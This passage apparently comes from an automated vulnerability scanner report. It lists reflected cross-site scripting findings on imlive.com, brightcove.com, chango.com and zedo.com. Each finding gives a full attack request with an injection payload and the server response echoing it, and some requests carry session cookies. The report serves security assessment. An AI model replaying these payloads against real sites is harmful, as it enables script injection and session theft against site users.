The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:16 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.226. http://br.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:02 GMT
Connection: close
Content-Length: 8329
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=br.imlive.com&ul=/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://br.imlive.com:80/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.227. http://br.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:01 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.228. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 5b13c<script>alert(1)</script>3acf57ed041 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ%2E%2E,AAAAE6Rs9lk%2E,SN2uQ1cpwui9Aq_exhx7aflP2FnHceiC HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 748

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q7f55be63070fb01af9305722d79174b22631affb
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:57:44 GMT
Server:
Content-Length: 5270

......../1/onResult.....}.
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
B3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwui9Aq_exhx7aflP2FnHceiC.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..BfP.%' ..ivideoPlayer5b13c<script>alert(1)</script>3acf57ed041..........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

4.229. http://c.chango.com/collector/tag.js [partnerId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.chango.com
Path:   /collector/tag.js

Issue detail

The value of the partnerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85054'%3balert(1)//7c6ede70f9f was submitted in the partnerId parameter. This input was echoed as 85054';alert(1)//7c6ede70f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee85054'%3balert(1)//7c6ede70f9f&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:50 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "566609a3d6eaa799dec1a9fc9ae77e4273324fd9"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=2d1cbd00-2b4b-11e0-9a94-00259009a9c2; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/
Content-Length: 1331

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('2d1cbd00-2b4b-11e0-9a94-00259009a9c2');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...
c = 'http://cm.g.doubleclick.net/pixel?nid=chango&referrerURL=' + encodeURIComponent("http://eztext.com/") + '&token=' + encodeURIComponent("2d1cbd00-2b4b-11e0-9a94-00259009a9c2") + '&partnerId=oversee85054';alert(1)//7c6ede70f9f';
})();(new Image()).src = 'http://ads.adbrite.com/adserver/vdi/806205?r=http%3A//c.chango.com/collector/mapping%3Fpartner%3DAdBrite%26chango_uid%3D2d1cbd00-2b4b-11e0-9a94-00259009a9c2%26partner_uid%3
...[SNIP]...

4.230. http://c.chango.com/collector/tag.js [referrerURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.chango.com
Path:   /collector/tag.js

Issue detail

The value of the referrerURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 543f3"%3balert(1)//6db19040e31 was submitted in the referrerURL parameter. This input was echoed as 543f3";alert(1)//6db19040e31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collector/tag.js?_r=1296236606219&partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Feztext.com%2F543f3"%3balert(1)//6db19040e31&q=mass%20texting HTTP/1.1
Host: c.chango.com
Proxy-Connection: keep-alive
Referer: http://searchportal.information.com/?o_id=131972&domainname=eztext.com&popunder=off&exit=off&adultfiler=off
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:50 GMT
Content-Type: text/javascript
Connection: close
Server: TornadoServer/1.1
Etag: "1374605d644743af6028f557ff6b098ab9a18c9d"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _t=2d47aca4-2b4b-11e0-abf9-00259009a9e4; Domain=chango.com; expires=Tue, 26 Jan 2021 01:57:50 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Fri, 29 Apr 2011 01:57:50 GMT; Path=/
Content-Length: 1331

(new Image()).src = 'http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=' + encodeURIComponent('2d47aca4-2b4b-11e0-abf9-00259009a9e4');(new Image()).src = 'http://bid.openx.net/cm?p
...[SNIP]...
d=' + encodeURIComponent('2d47aca4-2b4b-11e0-abf9-00259009a9e4');(function() {
(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&referrerURL=' + encodeURIComponent("http://eztext.com/543f3";alert(1)//6db19040e31") + '&token=' + encodeURIComponent("2d47aca4-2b4b-11e0-abf9-00259009a9e4") + '&partnerId=oversee';
})();(new Image()).src = 'http://ads.adbrite.com/adserver/vdi/806205?r=http%3A//c.chango.com/collecto
...[SNIP]...

4.231. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46055'%3balert(1)//5d9eeeeb662 was submitted in the $ parameter. This input was echoed as 46055';alert(1)//5d9eeeeb662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=46055'%3balert(1)//5d9eeeeb662&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:46055';alert(1)//5d9eeeeb662;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1934

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',46055';alert(1)//5d9eeeeb662';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,46055';alert(1)//5d9eeeeb662;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.232. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dc14"%3balert(1)//8701fee00ba was submitted in the $ parameter. This input was echoed as 7dc14";alert(1)//8701fee00ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=7dc14"%3balert(1)//8701fee00ba&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:7dc14";alert(1)//8701fee00ba;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:17 GMT
Connection: close
Content-Length: 1931

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',7dc14";alert(1)//8701fee00ba';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,7dc14";alert(1)//8701fee00ba;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.233. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b870"%3balert(1)//b6e0807d8e was submitted in the $ parameter. This input was echoed as 5b870";alert(1)//b6e0807d8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=5b870"%3balert(1)//b6e0807d8e&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:5b870";alert(1)//b6e0807d8e;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1932

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat=',5b870";alert(1)//b6e0807d8e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,5b870";alert(1)//b6e0807d8e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=126;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

4.234. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f791'%3balert(1)//4a5a3c4bd88 was submitted in the $ parameter. This input was echoed as 4f791';alert(1)//4a5a3c4bd88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

